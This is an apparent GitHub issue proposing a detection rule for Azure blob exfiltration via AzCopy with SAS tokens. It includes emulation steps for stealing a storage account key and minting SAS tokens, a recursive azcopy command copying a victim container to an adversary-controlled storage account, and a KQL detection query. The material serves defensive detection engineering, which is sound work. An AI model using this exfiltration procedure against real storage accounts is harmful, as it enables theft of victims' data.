Skip to content

[New Rule] Azure Storage Blob Retrieval via AzCopy with SAS Token #5178

New issue
New issue
Open
#5179
Open
[New Rule] Azure Storage Blob Retrieval via AzCopy with SAS Token#5178
#5179
Assignees
terrancedejesus
Labels
Rule: NewProposal for new rule
@terrancedejesus

Description

@terrancedejesus
terrancedejesus
opened on Oct 2, 2025

Summary

Missing detection coverage data exfiltration of blob storage leveraging AzCopy. AzCopy was used in an APT campaign by Storm-0501 after storage account keys were stolen. GetBlob is a common API operation recorded for retrieving blob objects. As a result, we limit this to only SAS tokens being used for auth. Additionally we set the rule type as New Terms on azure.platformlogs.properties.accountName which is the storage account name, thus is we havent seen GetBlob to an object with a SAS token for this storage account in the last 7 days, flag it.

Requires diagnostic (platform) logs for visibility into READ operations on blob storage.

Emulation

Emulated this behavior in our Azure tenant (victim), exfiltrating to an Elastic Azure tenant (adversary).

  1. Set up victim infrastructure in the victim tenant:

    • Created a resource group and storage account
    • Created a blob container and uploaded sample data files
    • Configured diagnostic settings to stream Storage logs to Event Hub for monitoring

  2. Simulated credential theft:

    • Retrieved the victim storage account key (simulating adversary theft of credentials)

  3. Set up adversary infrastructure in a separate adversary tenant:

    • Created a resource group and storage account for data exfiltration
    • Created a blob container to receive exfiltrated data

  4. Generated SAS tokens (adversary actions):

    • Created a SAS token with read/list permissions for the victim storage container using the stolen account key
    • Created a SAS token with write permissions for the adversary storage container

  5. Performed data exfiltration using AzCopy:

    azcopy copy "https://<victim-storage>.blob.core.windows.net/<victim-container>?<victim-SAS-token>" \
            "https://<adversary-storage>.blob.core.windows.net/<adversary-container>?<adversary-SAS-token>" \
            --recursive

Ref: https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/

Query

event.dataset: azure.platformlogs and
    event.action: GetBlob and
    azure.platformlogs.identity.type: SAS and
    azure.platformlogs.properties.userAgentHeader: AzCopy* and
    azure.platformlogs.statusCode: 200

Metadata

Metadata

Assignees

Labels

Rule: NewProposal for new rule

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions